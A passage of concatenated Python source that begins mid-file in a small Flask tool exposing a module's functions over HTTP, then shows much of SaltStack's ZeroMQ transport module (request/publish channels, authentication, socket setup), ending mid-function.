type_casted_parameters[param_name] = file_in_bytes_io
else:
data = request.json
type_hints = typing.get_type_hints(callable_)
for param_name, value in data.items():
type_ = type_hints[param_name]
if value is None:
type_casted_parameters[param_name] = value
continue
if type_ is datetime.datetime:
type_casted_parameters[param_name] = datetime.datetime.strptime(
value, "%Y-%m-%dT%H:%M:%S.%fZ"
).replace(tzinfo=pytz.UTC)
continue
if type_ is datetime.date:
type_casted_parameters[param_name] = datetime.datetime.strptime(
value, "%Y-%m-%dT%H:%M:%S.%fZ"
).date()
continue
if type_ is datetime.time:
type_casted_parameters[param_name] = datetime.datetime.strptime(
value, "%Y-%m-%dT%H:%M:%S.%fZ"
).time()
continue
if type_.__class__ == typing.Union.__class__:
for possible_type in type_.__args__:
if possible_type is not type(None): # noqa: E721
try:
type_casted_parameters[param_name] = possible_type(value)
except: # noqa: E722
pass
continue
type_casted_parameters[param_name] = type_(value)
status = "success"
try:
result = callable_(**type_casted_parameters)
except Exception as e:
status = "fail"
result = str(e)
if isinstance(result, io.BufferedReader):
return send_file(
result,
attachment_filename=urllib.parse.quote(os.path.basename(result.name)),
as_attachment=True,
)
return jsonify({"status": status, "result": result})
def load_module_by_path(path):
abspath = os.path.abspath(path)
if not os.path.exists(abspath):
raise ValueError("Module does not exist!")
sys.path.insert(0, os.getcwd())
module_name = os.path.splitext(os.path.basename(abspath))[0]
spec = importlib.util.spec_from_file_location(module_name, abspath)
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
return module
def _iter_module_files():
"""This iterates over all relevant Python files. It goes through all
loaded files from modules, all files in folders of already loaded modules
as well as all files reachable through a package.
"""
global MODULE
# The list call is necessary on Python 3 in case the module
# dictionary modifies during iteration.
for module in list(sys.modules.values()) + [MODULE]:
if module is None:
continue
filename = getattr(module, "__file__", None)
if filename:
if os.path.isdir(filename) and os.path.exists(
os.path.join(filename, "__init__.py")
):
filename = os.path.join(filename, "__init__.py")
old = None
while not os.path.isfile(filename):
old = filename
filename = os.path.dirname(filename)
if filename == old:
break
else:
if filename[-4:] in (".pyc", ".pyo"):
filename = filename[:-1]
yield filename
def watch_module():
global MODULE_PATH, MODULE, HAS_NEW_MODULE
global KEEP_WATCHING
from itertools import chain
mtimes = {}
while 1 and KEEP_WATCHING:
for filename in chain(_iter_module_files()):
try:
mtime = os.stat(filename).st_mtime
except OSError:
continue
old_time = mtimes.get(filename)
if old_time is None:
mtimes[filename] = mtime
continue
elif mtime > old_time:
HAS_NEW_MODULE = True
mtimes = {}
time.sleep(1)
def main():
global MODULE, MODULE_PATH, KEEP_WATCHING
parser = argparse.ArgumentParser(description="Touch Callable")
parser.add_argument("module_path", type=str)
parser.add_argument("--host", type=str, default="127.0.0.1")
parser.add_argument("--port", type=int, default=6789)
parser.add_argument("--debug", type=bool, default=False)
args = parser.parse_args()
MODULE_PATH = args.module_path
MODULE = load_module_by_path(args.module_path)
if not args.debug:
werkzeug_loger = logging.getLogger("werkzeug")
werkzeug_loger.setLevel(logging.ERROR)
os.environ["WERKZEUG_RUN_MAIN"] = "true"
import threading
t = threading.Thread(target=watch_module)
t.start()
import click
click.echo(" * touch-callable serving http://{}:{}".format(args.host, args.port))
app.run(host=args.host, debug=args.debug, port=args.port)
KEEP_WATCHING = False
t.join()
if __name__ == "__main__":
main()
|
zeromq.py
|
# -*- coding: utf-8 -*-
'''
Zeromq transport classes
'''
# Import Python Libs
from __future__ import absolute_import, print_function, unicode_literals
import os
import sys
import copy
import errno
import signal
import socket
import hashlib
import logging
import weakref
import threading
from random import randint
# Import Salt Libs
import salt.auth
import salt.crypt
import salt.log.setup
import salt.utils.event
import salt.utils.files
import salt.utils.minions
import salt.utils.process
import salt.utils.stringutils
import salt.utils.verify
import salt.utils.zeromq
import salt.utils.versions
import salt.payload
import salt.transport.client
import salt.transport.server
import salt.transport.mixins.auth
from salt.ext import six
from salt.exceptions import SaltReqTimeoutError, SaltException
from salt._compat import ipaddress
from salt.utils.zeromq import zmq, ZMQDefaultLoop, install_zmq, ZMQ_VERSION_INFO, LIBZMQ_VERSION_INFO
import zmq.error
import zmq.eventloop.ioloop
import zmq.eventloop.zmqstream
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
# Import Tornado Libs
import salt.ext.tornado
import salt.ext.tornado.ioloop
import salt.ext.tornado.gen
import salt.ext.tornado.concurrent
# Import third party libs
try:
from M2Crypto import RSA
HAS_M2 = True
except ImportError:
HAS_M2 = False
try:
from Cryptodome.Cipher import PKCS1_OAEP
except ImportError:
from Crypto.Cipher import PKCS1_OAEP
log = logging.getLogger(__name__)
def _get_master_uri(master_ip,
master_port,
source_ip=None,
source_port=None):
'''
Return the ZeroMQ URI to connect the Minion to the Master.
It supports different source IP / port, given the ZeroMQ syntax:
// Connecting using a IP address and bind to an IP address
rc = zmq_connect(socket, "tcp://192.168.1.17:5555;192.168.1.1:5555"); assert (rc == 0);
Source: http://api.zeromq.org/4-1:zmq-tcp
'''
from salt.utils.zeromq import ip_bracket
master_uri = 'tcp://{master_ip}:{master_port}'.format(
master_ip=ip_bracket(master_ip), master_port=master_port)
if source_ip or source_port:
if LIBZMQ_VERSION_INFO >= (4, 1, 6) and ZMQ_VERSION_INFO >= (16, 0, 1):
# The source:port syntax for ZeroMQ has been added in libzmq 4.1.6
# which is included in the pyzmq wheels starting with 16.0.1.
if source_ip and source_port:
master_uri = 'tcp://{source_ip}:{source_port};{master_ip}:{master_port}'.format(
source_ip=ip_bracket(source_ip), source_port=source_port,
master_ip=ip_bracket(master_ip), master_port=master_port)
elif source_ip and not source_port:
master_uri = 'tcp://{source_ip}:0;{master_ip}:{master_port}'.format(
source_ip=ip_bracket(source_ip),
master_ip=ip_bracket(master_ip), master_port=master_port)
elif source_port and not source_ip:
ip_any = '0.0.0.0' if ipaddress.ip_address(master_ip).version == 4 else ip_bracket('::')
master_uri = 'tcp://{ip_any}:{source_port};{master_ip}:{master_port}'.format(
ip_any=ip_any, source_port=source_port,
master_ip=ip_bracket(master_ip), master_port=master_port)
else:
log.warning('Unable to connect to the Master using a specific source IP / port')
log.warning('Consider upgrading to pyzmq >= 16.0.1 and libzmq >= 4.1.6')
log.warning('Specific source IP / port for connecting to master returner port: configuraion ignored')
return master_uri
class AsyncZeroMQReqChannel(salt.transport.client.ReqChannel):
'''
Encapsulate sending routines to ZeroMQ.
ZMQ Channels default to 'crypt=aes'
'''
# This class is only a singleton per minion/master pair
# mapping of io_loop -> {key -> channel}
instance_map = weakref.WeakKeyDictionary()
def __new__(cls, opts, **kwargs):
'''
Only create one instance of channel per __key()
'''
# do we have any mapping for this io_loop
io_loop = kwargs.get('io_loop')
if io_loop is None:
install_zmq()
io_loop = ZMQDefaultLoop.current()
if io_loop not in cls.instance_map:
cls.instance_map[io_loop] = weakref.WeakValueDictionary()
loop_instance_map = cls.instance_map[io_loop]
key = cls.__key(opts, **kwargs)
obj = loop_instance_map.get(key)
if obj is None:
log.debug('Initializing new AsyncZeroMQReqChannel for %s', key)
# we need to make a local variable for this, as we are going to store
# it in a WeakValueDictionary-- which will remove the item if no one
# references it-- this forces a reference while we return to the caller
obj = object.__new__(cls)
obj.__singleton_init__(opts, **kwargs)
obj._instance_key = key
loop_instance_map[key] = obj
obj._refcount = 1
obj._refcount_lock = threading.RLock()
log.trace('Inserted key into loop_instance_map id %s for key %s and process %s',
id(loop_instance_map), key, os.getpid())
else:
with obj._refcount_lock:
obj._refcount += 1
log.debug('Re-using AsyncZeroMQReqChannel for %s', key)
return obj
def __deepcopy__(self, memo):
cls = self.__class__
result = cls.__new__(cls, copy.deepcopy(self.opts, memo)) # pylint: disable=too-many-function-args
memo[id(self)] = result
for key in self.__dict__:
if key in ('_io_loop', '_refcount', '_refcount_lock'):
continue
# The _io_loop has a thread Lock which will fail to be deep
# copied. Skip it because it will just be recreated on the
# new copy.
if key == 'message_client':
# Recreate the message client because it will fail to be deep
# copied. The reason is the same as the io_loop skip above.
setattr(result, key,
AsyncReqMessageClientPool(result.opts,
args=(result.opts, self.master_uri,),
kwargs={'io_loop': self._io_loop}))
continue
setattr(result, key, copy.deepcopy(self.__dict__[key], memo))
return result
@classmethod
def __key(cls, opts, **kwargs):
return (opts['pki_dir'], # where the keys are stored
opts['id'], # minion ID
kwargs.get('master_uri', opts.get('master_uri')), # master ID
kwargs.get('crypt', 'aes'), # TODO: use the same channel for crypt
)
# has to remain empty for singletons, since __init__ will *always* be called
def __init__(self, opts, **kwargs):
pass
# an init for the singleton instance to call
def __singleton_init__(self, opts, **kwargs):
self.opts = dict(opts)
self.ttype = 'zeromq'
# crypt defaults to 'aes'
self.crypt = kwargs.get('crypt', 'aes')
if 'master_uri' in kwargs:
self.opts['master_uri'] = kwargs['master_uri']
self._io_loop = kwargs.get('io_loop')
if self._io_loop is None:
install_zmq()
self._io_loop = ZMQDefaultLoop.current()
if self.crypt != 'clear':
# we don't need to worry about auth as a kwarg, since its a singleton
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self._io_loop)
log.debug('Connecting the Minion to the Master URI (for the return server): %s', self.master_uri)
self.message_client = AsyncReqMessageClientPool(self.opts,
args=(self.opts, self.master_uri,),
kwargs={'io_loop': self._io_loop})
self._closing = False
@classmethod
def force_close_all_instances(cls):
"""
Will force close all instances
ZMQ can hang on quit if left to deconstruct on its own.
This because is deconstructs out of order.
:return: None
"""
for weak_dict in list(cls.instance_map.values()):
for instance in list(weak_dict.values()):
instance.close()
def close(self):
'''
Since the message_client creates sockets and assigns them to the IOLoop we have to
specifically destroy them, since we aren't the only ones with references to the FDs
'''
if self._closing:
return
if self._refcount > 1:
# Decrease refcount
with self._refcount_lock:
self._refcount -= 1
log.debug(
'This is not the last %s instance. Not closing yet.',
self.__class__.__name__
)
return
log.debug('Closing %s instance', self.__class__.__name__)
self._closing = True
if hasattr(self, 'message_client'):
self.message_client.close()
# Remove the entry from the instance map so that a closed entry may not
# be reused.
# This forces this operation even if the reference count of the entry
# has not yet gone to zero.
if self._io_loop in self.__class__.instance_map:
loop_instance_map = self.__class__.instance_map[self._io_loop]
if self._instance_key in loop_instance_map:
del loop_instance_map[self._instance_key]
if not loop_instance_map:
del self.__class__.instance_map[self._io_loop]
# pylint: disable=W1701
def __del__(self):
with self._refcount_lock:
# Make sure we actually close no matter if something
# went wrong with our ref counting
self._refcount = 1
try:
self.close()
except socket.error as exc:
if exc.errno != errno.EBADF:
# If its not a bad file descriptor error, raise
raise
# pylint: enable=W1701
@property
def master_uri(self):
if 'master_uri' in self.opts:
return self.opts['master_uri']
# if by chance master_uri is not there..
if 'master_ip' in self.opts:
return _get_master_uri(self.opts['master_ip'],
self.opts['master_port'],
source_ip=self.opts.get('source_ip'),
source_port=self.opts.get('source_ret_port'))
# if we've reached here something is very abnormal
raise SaltException('ReqChannel: missing master_uri/master_ip in self.opts')
def _package_load(self, load):
return {
'enc': self.crypt,
'load': load,
}
@salt.ext.tornado.gen.coroutine
def crypted_transfer_decode_dictentry(self, load, dictkey=None, tries=3, timeout=60):
if not self.auth.authenticated:
# Return control back to the caller, continue when authentication succeeds
yield self.auth.authenticate()
# Return control to the caller. When send() completes, resume by populating ret with the Future.result
ret = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
key = self.auth.get_keys()
if 'key' not in ret:
# Reauth in the case our key is deleted on the master side.
yield self.auth.authenticate()
ret = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
if HAS_M2:
aes = key.private_decrypt(ret['key'],
RSA.pkcs1_oaep_padding)
else:
cipher = PKCS1_OAEP.new(key)
aes = cipher.decrypt(ret['key'])
pcrypt = salt.crypt.Crypticle(self.opts, aes)
data = pcrypt.loads(ret[dictkey])
if six.PY3:
data = salt.transport.frame.decode_embedded_strs(data)
raise salt.ext.tornado.gen.Return(data)
@salt.ext.tornado.gen.coroutine
def _crypted_transfer(self, load, tries=3, timeout=60, raw=False):
'''
Send a load across the wire, with encryption
In case of authentication errors, try to renegotiate authentication
and retry the method.
Indeed, we can fail too early in case of a master restart during a
minion state execution call
:param dict load: A load to send across the wire
:param int tries: The number of times to make before failure
:param int timeout: The number of seconds on a response before failing
'''
@salt.ext.tornado.gen.coroutine
def _do_transfer():
# Yield control to the caller. When send() completes, resume by populating data with the Future.result
data = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
# we may not have always data
# as for example for saltcall ret submission, this is a blind
# communication, we do not subscribe to return events, we just
# upload the results to the master
if data:
data = self.auth.crypticle.loads(data, raw)
if six.PY3 and not raw:
data = salt.transport.frame.decode_embedded_strs(data)
raise salt.ext.tornado.gen.Return(data)
if not self.auth.authenticated:
# Return control back to the caller, resume when authentication succeeds
yield self.auth.authenticate()
try:
# We did not get data back the first time. Retry.
ret = yield _do_transfer()
except salt.crypt.AuthenticationError:
# If auth error, return control back to the caller, continue when authentication succeeds
yield self.auth.authenticate()
ret = yield _do_transfer()
raise salt.ext.tornado.gen.Return(ret)
@salt.ext.tornado.gen.coroutine
def _uncrypted_transfer(self, load, tries=3, timeout=60):
'''
Send a load across the wire in cleartext
:param dict load: A load to send across the wire
:param int tries: The number of times to make before failure
:param int timeout: The number of seconds on a response before failing
'''
ret = yield self.message_client.send(
self._package_load(load),
timeout=timeout,
tries=tries,
)
raise salt.ext.tornado.gen.Return(ret)
@salt.ext.tornado.gen.coroutine
def send(self, load, tries=3, timeout=60, raw=False):
'''
Send a request, return a future which will complete when we send the message
'''
if self.crypt == 'clear':
ret = yield self._uncrypted_transfer(load, tries=tries, timeout=timeout)
else:
ret = yield self._crypted_transfer(load, tries=tries, timeout=timeout, raw=raw)
raise salt.ext.tornado.gen.Return(ret)
class AsyncZeroMQPubChannel(salt.transport.mixins.auth.AESPubClientMixin, salt.transport.client.AsyncPubChannel):
'''
A transport channel backed by ZeroMQ for a Salt Publisher to use to
publish commands to connected minions
'''
def __init__(self,
opts,
**kwargs):
self.opts = opts
self.ttype = 'zeromq'
self.io_loop = kwargs.get('io_loop')
if self.io_loop is None:
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
self.hexid = hashlib.sha1(salt.utils.stringutils.to_bytes(self.opts['id'])).hexdigest()
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
self.serial = salt.payload.Serial(self.opts)
self.context = zmq.Context()
self._socket = self.context.socket(zmq.SUB)
if self.opts['zmq_filtering']:
# TODO: constants file for "broadcast"
self._socket.setsockopt(zmq.SUBSCRIBE, b'broadcast')
if self.opts.get('__role') == 'syndic':
self._socket.setsockopt(zmq.SUBSCRIBE, b'syndic')
else:
self._socket.setsockopt(
zmq.SUBSCRIBE,
salt.utils.stringutils.to_bytes(self.hexid)
)
else:
self._socket.setsockopt(zmq.SUBSCRIBE, b'')
self._socket.setsockopt(zmq.IDENTITY, salt.utils.stringutils.to_bytes(self.opts['id']))
# TODO: cleanup all the socket opts stuff
if hasattr(zmq, 'TCP_KEEPALIVE'):
self._socket.setsockopt(
zmq.TCP_KEEPALIVE, self.opts['tcp_keepalive']
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, self.opts['tcp_keepalive_idle']
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, self.opts['tcp_keepalive_cnt']
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, self.opts['tcp_keepalive_intvl']
)
recon_delay = self.opts['recon_default']
if self.opts['recon_randomize']:
recon_delay = randint(self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max'])
log.debug(
"Generated random reconnect delay between '%sms' and '%sms' (%s)",
self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max'],
recon_delay
)
log.debug("Setting zmq_reconnect_ivl to '%sms'", recon_delay)
self._socket.setsockopt(zmq.RECONNECT_IVL, recon_delay)
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
log.debug(
"Setting zmq_reconnect_ivl_max to '%sms'",
self.opts['recon_default'] + self.opts['recon_max']
)
self._socket.setsockopt(
zmq.RECONNECT_IVL_MAX, self.opts['recon_max']
)
if (self.opts['ipv6'] is True or ':' in self.opts['master_ip']) and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self._socket.setsockopt(zmq.IPV4ONLY, 0)
if HAS_ZMQ_MONITOR and self.opts['zmq_monitor']:
self._monitor = ZeroMQSocketMonitor(self._socket)
self._monitor.start_io_loop(self.io_loop)
def close(self):
if hasattr(self, '_monitor') and self._monitor is not None:
self._monitor.stop()
self._monitor = None
if hasattr(self, '_stream'):
if ZMQ_VERSION_INFO < (14, 3, 0):
# stream.close() doesn't work properly on pyzmq < 14.3.0
self._stream.io_loop.remove_handler(self._stream.socket)
self._stream.socket.close(0)
else:
self._stream.close(0)
elif hasattr(self, '_socket'):
self._socket.close(0)
if hasattr(self, 'context') and self.context.closed is False:
self.context.term()
def destroy(self):
# Bacwards compat
salt.utils.versions.warn_until(
'Sodium',
'Calling {0}.destroy() is deprecated. Please call {0}.close() instead.'.format(
self.__class__.__name__
),
stacklevel=3
)
self.close()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
# TODO: this is the time to see if we are connected, maybe use the req channel to guess?
@salt.ext.tornado.gen.coroutine
def connect(self):
if not self.auth.authenticated:
yield self.auth.authenticate()
# if this is changed from the default, we assume it was intentional
if int(self.opts.get('publish_port', 4506)) != 4506:
self.publish_port = self.opts.get('publish_port')
# else take the relayed publish_port master reports
else:
self.publish_port = self.auth.creds['publish_port']
log.debug('Connecting the Minion to the Master publish port, using the URI: %s', self.master_pub)
self._socket.connect(self.master_pub)
@property
def master_pub(self):
'''
Return the master publish port
'''
return _get_master_uri(self.opts['master_ip'],
self.publish_port,
source_ip=self.opts.get('source_ip'),
source_port=self.opts.get('source_publish_port'))
@salt.ext.tornado.gen.coroutine
def _decode_messages(self, messages):
'''
Take the zmq messages, decrypt/decode them into a payload
:param list messages: A list of messages to be decoded
'''
messages_len = len(messages)
# if it was one message, then its old style
if messages_len == 1:
payload = self.serial.loads(messages[0])
# 2 includes a header which says who should do it
elif messages_len == 2:
message_target = salt.utils.stringutils.to_str(messages[0])
if (self.opts.get('__role') != 'syndic' and message_target not in ('broadcast', self.hexid)) or \
(self.opts.get('__role') == 'syndic' and message_target not in ('broadcast', 'syndic')):
log.debug('Publish received for not this minion: %s', message_target)
raise salt.ext.tornado.gen.Return(None)
payload = self.serial.loads(messages[1])
else:
raise Exception(('Invalid number of messages ({0}) in zeromq pub'
'message from master').format(len(messages_len)))
# Yield control back to the caller. When the payload has been decoded, assign
# the decoded payload to 'ret' and resume operation
ret = yield self._decode_payload(payload)
raise salt.ext.tornado.gen.Return(ret)
@property
def stream(self):
'''
Return the current zmqstream, creating one if necessary
'''
if not hasattr(self, '_stream'):
self._stream = zmq.eventloop.zmqstream.ZMQStream(self._socket, io_loop=self.io_loop)
return self._stream
def on_recv(self, callback):
'''
Register a callback for received messages (that we didn't initiate)
:param func callback: A function which should be called when data is received
'''
if callback is None:
return self.stream.on_recv(None)
@salt.ext.tornado.gen.coroutine
def wrap_callback(messages):
payload = yield self._decode_messages(messages)
if payload is not None:
callback(payload)
return self.stream.on_recv(wrap_callback)
class ZeroMQReqServerChannel(salt.transport.mixins.auth.AESReqServerMixin,
salt.transport.server.ReqServerChannel):
def __init__(self, opts):
salt.transport.server.ReqServerChannel.__init__(self, opts)
self._closing = False
def zmq_device(self):
'''
Multiprocessing target for the zmq queue device
'''
self.__setup_signals()
salt.utils.process.appendproctitle('MWorkerQueue')
self.context = zmq.Context(self.opts['worker_threads'])
# Prepare the zeromq sockets
self.uri = 'tcp://{interface}:{ret_port}'.format(**self.opts)
self.clients = self.context.socket(zmq.ROUTER)
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self.clients.setsockopt(zmq.IPV4ONLY, 0)
self.clients.setsockopt(zmq.BACKLOG, self.opts.get('zmq_backlog', 1000))
self._start_zmq_monitor()
self.workers = self.context.socket(zmq.DEALER)
if self.opts.get('ipc_mode', '') == 'tcp':
self.w_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_workers', 4515)
)
else:
self.w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
log.info('Setting up the master communication server')
self.clients.bind(self.uri)
self.workers.bind(self.w_uri)
while True:
if self.clients.closed or self.workers.closed:
break
try:
zmq.device(zmq.QUEUE, self.clients, self.workers)
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
six.reraise(*sys.exc_info())
except (KeyboardInterrupt, SystemExit):
break
def close(self):
'''
Cleanly shutdown the router socket
'''
if self._closing:
return
log.info('MWorkerQueue under PID %s is closing', os.getpid())
self._closing = True
# pylint: disable=E0203
if getattr(self, '_monitor', None) is not None:
self._monitor.stop()
self._monitor = None
if getattr(self, '_w_monitor', None) is not None:
self._w_monitor.stop()
self._w_monitor = None
if hasattr(self, 'clients') and self.clients.closed is False:
self.clients.close()
if hasattr(self, 'workers') and self.workers.closed is False:
self.workers.close()
if hasattr(self, 'stream'):
self.stream.close()
if hasattr(self, '_socket') and self._socket.closed is False:
self._socket.close()
if hasattr(self, 'context') and self.context.closed is False:
self.context.term()
# pylint: enable=E0203
def pre_fork(self, process_manager):
'''
Pre-fork we need to create the zmq router device
:param func process_manager: An instance of salt.utils.process.ProcessManager
'''
salt.transport.mixins.auth.AESReqServerMixin.pre_fork(self, process_manager)
process_manager.add_process(self.zmq_device)
def _start_zmq_monitor(self):
'''
Starts ZMQ monitor for debugging purposes.
:return:
'''
# Socket monitor shall be used the only for debug
# purposes so using threading doesn't look too bad here
if HAS_ZMQ_MONITOR and self.opts['zmq_monitor']:
log.debug('Starting ZMQ monitor')
import threading
self._w_monitor = ZeroMQSocketMonitor(self._socket)
threading.Thread(target=self._w_monitor.start_poll).start()
log.debug('ZMQ monitor has been started started')
def post_fork(self, payload_handler, io_loop):
'''
After forking we need to create all of the local sockets to listen to the
router
:param func payload_handler: A function to called to handle incoming payloads as
they are picked up off the wire
:param IOLoop io_loop: An instance of a Tornado IOLoop, to handle event scheduling
'''
self.payload_handler = payload_handler
self.io_loop = io_loop
self.context = zmq.Context(1)
self._socket = self.context.socket(zmq.REP)
self._start_zmq_monitor()
if self.opts.get('ipc_mode', '') == 'tcp':
self.w_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_workers', 4515)
)
else:
self.w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
log.info('Worker binding to socket %s', self.w_uri)
self._socket.connect(self.w_uri)
salt.transport.mixins.auth.AESReqServerMixin.post_fork(self, payload_handler, io_loop)
self.stream = zmq.eventloop.zmqstream.ZMQStream(self._socket, io_loop=self.io_loop)
self.stream.on_recv_stream(self.handle_message)
@salt.ext.tornado.gen.coroutine
def handle_message(self, stream, payload):
'''
Handle incoming messages from underlying TCP streams
:stream ZMQStream stream: A ZeroMQ stream.
See http://zeromq.github.io/pyzmq/api/generated/zmq.eventloop.zmqstream.html
:param dict payload: A payload to process
'''
try:
payload = self.serial.loads(payload[0])
payload = self._decode_payload(payload)
except Exception as exc: # pylint: disable=broad-except
exc_type = type(exc).__name__
if exc_type == 'AuthenticationError':
log.debug(
'Minion failed to auth to master. Since the payload is '
'encrypted, it is not known which minion failed to '
'authenticate. It is likely that this is a transient '
'failure due to the master rotating its public key.'
)
else:
log.error('Bad load from minion: %s: %s', exc_type, exc)
stream.send(self.serial.dumps('bad load'))
raise salt.ext.tornado.gen.Return()
# TODO helper functions to normalize payload?
if not isinstance(payload, dict) or not isinstance(payload.get('load'), dict):
log.error('payload and load must be a dict. Payload was: %s and load was %s', payload, payload.get('load'))
stream.send(self.serial.dumps('payload and load must be a dict'))
raise salt.ext.tornado.gen.Return()
try:
id_ = payload['load'].get('id', '')
if str('\0') in id_:
log.error('Payload contains an id with a null byte: %s', payload)
stream.send(self.serial.dumps('bad load: id contains a null byte'))
raise salt.ext.tornado.gen.Return()
except TypeError:
log.error('Payload contains non-string id: %s', payload)
stream.send(self.serial.dumps('bad load: id {0} is not a string'.format(id_)))
raise salt.ext.tornado.gen.Return()
# intercept the "_auth" commands, since the main daemon shouldn't know
# anything about our key auth
if payload['enc'] == 'clear' and payload.get('load', {}).get('cmd') == '_auth':
stream.send(self.serial.dumps(self._auth(payload['load'])))
raise salt.ext.tornado.gen.Return()
# TODO: test
try:
# Take the payload_handler function that was registered when we created the channel
# and call it, returning control to the caller until it completes
ret, req_opts = yield self.payload_handler(payload)
except Exception as e: # pylint: disable=broad-except
# always attempt to return an error to the minion
stream.send('Some exception handling minion payload')
log.error('Some exception handling a payload from minion', exc_info=True)
raise salt.ext.tornado.gen.Return()
req_fun = req_opts.get('fun', 'send')
if req_fun == 'send_clear':
stream.send(self.serial.dumps(ret))
elif req_fun == 'send':
stream.send(self.serial.dumps(self.crypticle.dumps(ret)))
elif req_fun == 'send_private':
stream.send(self.serial.dumps(self._encrypt_private(ret,
req_opts['key'],
req_opts['tgt'],
)))
else:
log.error('Unknown req_fun %s', req_fun)
# always attempt to return an error to the minion
stream.send('Server-side exception handling payload')
raise salt.ext.tornado.gen.Return()
def __setup_signals(self):
signal.signal(signal.SIGINT, self._handle_signals)
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe):
msg = '{0} received a '.format(self.__class__.__name__)
if signum == signal.SIGINT:
msg += 'SIGINT'
elif signum == signal.SIGTERM:
msg += 'SIGTERM'
msg += '. Exiting'
log.debug(msg)
self.close()
sys.exit(salt.defaults.exitcodes.EX_OK)
def _set_tcp_keepalive(zmq_socket, opts):
'''
Ensure that TCP keepalives are set as specified in "opts".
Warning: Failure to set TCP keepalives on the salt-master can result in
not detecting the loss of a minion when the connection is lost or when
it's host has been terminated without first closing the socket.
Salt's Presence System depends on this connection status to know if a minion
is "present".
Warning: Failure to set TCP keepalives on minions can result in frequent or
unexpected disconnects!
'''
if hasattr(zmq, 'TCP_KEEPALIVE') and opts:
if 'tcp_keepalive' in opts:
zmq_socket.setsockopt(
zmq.TCP_KEEPALIVE, opts['tcp_keepalive']
)
if 'tcp_keepalive_idle' in opts:
zmq_socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, opts['tcp_keepalive_idle']
)
if 'tcp_keepalive_cnt' in opts:
zmq_socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, opts['tcp_keepalive_cnt']
)
if 'tcp_keepalive_intvl' in opts:
zmq_socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, opts['tcp_keepalive_intvl']
)
class ZeroMQPubServerChannel(salt.transport.server.PubServerChannel):
'''
Encapsulate synchronous operations for a publisher channel
'''
_sock_data = threading.local()
def __init__(self, opts):
self.opts = opts
self.serial = salt.payload.Serial(self.opts) # TODO: in init?
self.ckminions = salt.utils.minions.CkMinions(self.opts)
def connect(self):
return salt.ext.tornado.gen.sleep(5)
def _publish_daemon(self, log_queue=None):
'''
Bind to the interface specified in the configuration file
'''
salt.utils.process.appendproctitle(self.__class__.__name__)
if log_queue:
salt.log.setup.set_multiprocessing_logging_queue(log_queue)
salt.log.setup.setup_multiprocessing_logging(log_queue)
# Set up the context
context = zmq.Context(1)
# Prepare minion publish socket
pub_sock = context.socket(zmq.PUB)
_set_tcp_keepalive(pub_sock, self.opts)
# if 2.1 >= zmq < 3.0, we only have one HWM setting
try:
pub_sock.setsockopt(zmq.HWM, self.opts.get('pub_hwm', 1000))
# in zmq >= 3.0, there are separate send and receive HWM settings
except AttributeError:
# Set the High Water Marks. For more information on HWM, see:
# http://api.zeromq.org/4-1:zmq-setsockopt
pub_sock.setsockopt(zmq.SNDHWM, self.opts.get('pub_hwm', 1000))
pub_sock.setsockopt(zmq.RCVHWM, self.opts.get('pub_hwm', 1000))
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
pub_sock.setsockopt(zmq.IPV4ONLY, 0)
pub_sock.setsockopt(zmq.BACKLOG, self.opts.get('zmq_backlog', 1000))
pub_sock.setsockopt(zmq.LINGER, -1)
pub_uri = 'tcp://{interface}:{publish_port}'.format(**self.opts)
# Prepare minion pull socket
pull_sock = context.socket(zmq.PULL)
pull_sock.setsockopt(zmq.LINGER, -1)
if self.opts.get('ipc_mode', '') == 'tcp':
pull_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_publish_pull', 4514)
)
else:
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
salt.utils.zeromq.check_ipc_path_max_len(pull_uri)
# Start the minion command publisher
log.info('Starting the Salt Publisher on %s', pub_uri)
pub_sock.bind(pub_uri)
# Securely create socket
log.info('Starting the Salt Puller on %s', pull_uri)
with salt.utils.files.set_umask(0o177):
pull_sock.bind(pull_uri)
try:
while True:
# Catch and handle EINTR from when this process is sent
# SIGUSR1 gracefully so we don't choke and die horribly
try:
log.debug('Publish daemon getting data from puller %s', pull_uri)
package = pull_sock.recv()
log.debug('Publish daemon received payload. size=%d', len(package))
unpacked_package = salt.payload.unpackage(package)
if six.PY3:
unpacked_package = salt.transport.frame.decode_embedded_strs(unpacked_package)
payload = unpacked_package['payload']
log.trace('Accepted unpacked package from puller')
if self.opts['zmq_filtering']:
# if you have a specific topic list, use that
if 'topic_lst' in unpacked_package:
for topic in unpacked_package['topic_lst']:
log.trace('Sending filtered data over publisher %s', pub_uri)
